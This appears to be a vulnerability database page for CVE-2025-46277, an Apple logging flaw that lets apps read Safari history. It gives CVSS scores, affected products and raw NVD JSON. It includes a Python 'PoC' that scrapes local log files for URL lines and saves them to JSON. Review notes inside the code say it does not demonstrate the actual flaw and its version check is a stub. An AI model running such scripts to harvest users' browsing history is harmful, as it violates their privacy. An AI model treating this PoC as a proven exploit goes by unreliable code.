Security Vulnerability Report
CVE-2025-46277 CVSS 3.3 LOW

CVE-2025-46277

Published: 2025-12-17 21:16:13
Last Modified: 2026-04-02 19:21:03

Description

A logging issue was addressed with improved data redaction. This issue is fixed in iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, watchOS 26.2. An app may be able to access a user’s Safari history.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:* - VULNERABLE
iOS < 26.2
iPadOS < 26.2
macOS Tahoe < 26.2
watchOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46277 PoC - Safari History Access via Log Files
# This PoC demonstrates the vulnerability where an app can access
# user's Safari history through unredacted system logs
#
# NOTE(review): what this script actually does is scan three fixed file
# paths for lines containing a few substrings and dump the hits to a JSON
# file. It does not parse the unified log, does not identify a Safari
# process or history store, and its version check is a stub (see
# check_vulnerable_version). Read it as a log-grep demo; whether it
# reproduces the redaction flaw the advisory describes is not established
# by anything in the code.
import os
import sys  # NOTE(review): imported but never used in this script
import json
from datetime import datetime


def check_vulnerable_version() -> bool:
    """Return True unconditionally.

    The ``vulnerable_versions`` table is built but never consulted, and no
    platform or version lookup is performed, so the name promises a check
    the function does not do. Any caller gating on this value is always
    let through.
    """
    # Simulated version check
    vulnerable_versions = {  # built for illustration only; never read
        'iOS': ['< 26.2'],
        'iPadOS': ['< 26.2'],
        'macOS': ['< 26.2'],
        'watchOS': ['< 26.2']
    }
    return True  # Assume vulnerable for demonstration


def read_safari_logs() -> list[dict[str, str]]:
    """Scan a fixed list of log paths for lines that look like URLs.

    Each path is ``expanduser``-ed and skipped unless it exists. Every
    existing path is opened as UTF-8 text with undecodable bytes dropped
    (``errors='ignore'``), so a binary file at one of these locations is
    read as garbled text rather than parsed. Matching is plain substring
    search; see the inline note on the condition.

    Returns:
        A list of dicts with keys ``timestamp`` (the time of the scan, not
        of the log entry), ``source`` (the un-expanded path string) and
        ``data`` (the stripped matching line). Empty when nothing matched
        or no path was readable.
    """
    log_paths = [
        '/var/log/system.log',
        # NOTE(review): this looks like a directory name rather than a file;
        # os.path.exists() is true for directories, and open() on one raises
        # IsADirectoryError, which the broad except below turns into a
        # printed error and a skip.
        '~/Library/Logs/CoreSimulation/Safari',
        '/private/var/log/asl/Safari.asl'
    ]
    extracted_history = []
    for log_path in log_paths:
        expanded_path = os.path.expanduser(log_path)
        if os.path.exists(expanded_path):
            try:
                with open(expanded_path, 'r', encoding='utf-8', errors='ignore') as f:
                    for line in f:
                        # Look for Safari history patterns in logs
                        # Precedence: ``and`` binds tighter than ``or``, so this reads as
                        #   ('Safari' in line and 'URL' in line) or 'history' in line.lower()
                        # -- the right-hand branch matches any line mentioning
                        # "history", whether or not Safari is involved.
                        if 'Safari' in line and 'URL' in line or 'history' in line.lower():
                            # Extract potential history entries
                            if 'http' in line or 'www.' in line:
                                extracted_history.append({
                                    'timestamp': datetime.now().isoformat(),  # scan time, not the entry's own timestamp
                                    'source': log_path,
                                    'data': line.strip()
                                })
            except PermissionError:
                print(f"[-] Permission denied: {log_path}")
            except Exception as e:
                # Broad catch: any other failure (opening a directory, an I/O
                # error mid-read) is printed and the path is skipped.
                print(f"[-] Error reading {log_path}: {e}")
    return extracted_history


def exploit_cve_2025_46277() -> list[dict[str, str]] | None:
    """Run the demo end to end and return what read_safari_logs found.

    Prints a banner, consults check_vulnerable_version (which always
    returns True, so the "patched" branch is unreachable as written),
    scans the log paths, echoes up to five hits and writes all of them as
    JSON to ``extracted_safari_history.json`` in the current working
    directory.

    Returns:
        The list of matched entries, or None when nothing matched (or if
        the version check were ever to report patched).
    """
    print("[*] CVE-2025-46277 PoC - Safari History Access via Logs")
    print("[*] Target: Apple iOS/macOS/iPadOS/watchOS < 26.2")
    print("-" * 60)
    if not check_vulnerable_version():
        # Unreachable with the current stub; kept as the intended gate.
        print("[+] System appears to be patched")
        return None
    print("[*] Attempting to read Safari-related system logs...")
    history_data = read_safari_logs()
    if history_data:
        print(f"[+] Successfully extracted {len(history_data)} history entries")
        print("\n[+] Sample extracted data:")
        for entry in history_data[:5]:
            print(f" - {entry['data']}")
        # Save extracted data
        # Relative path: the file lands in whatever directory the script is
        # run from. No encoding is given, so the platform default applies.
        output_file = 'extracted_safari_history.json'
        with open(output_file, 'w') as f:
            json.dump(history_data, f, indent=2)
        print(f"\n[+] Data saved to: {output_file}")
        return history_data
    else:
        print("[-] No Safari history data found in logs")
        return None


if __name__ == '__main__':
    exploit_cve_2025_46277()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46277", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:13.150", "lastModified": "2026-04-02T19:21:02.547", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logging issue was addressed with improved data redaction. This issue is fixed in iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, watchOS 26.2. An app may be able to access a user’s Safari history."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EA029506-5678-444B-93B5-27DAD643A1C0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", 
"versionEndExcluding": "26.2", "matchCriteriaId": "6276FDCA-3407-4FDD-8437-B57C98A97084"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "15574823-ECE0-4394-99BC-6AFA34E599CC"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125890", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}